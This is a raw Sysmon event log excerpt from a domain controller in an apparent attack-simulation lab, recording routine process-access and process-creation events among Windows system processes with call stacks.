08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}612732C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}612732C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0A00-000000007F01}8561264C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0A00-000000007F01}8561260C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.824{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.824{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.824{5D479F2C-169F-5F84-0A00-000000007F01}8561132C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.824{5D479F2C-169F-5F84-0A00-000000007F01}8561128C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.832{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{5D479F2C-16A1-5F84-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.824{5D479F2C-169F-5F84-0A00-000000007F01}8561192C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0A00-000000007F01}8561152C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0A00-000000007F01}856932C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCR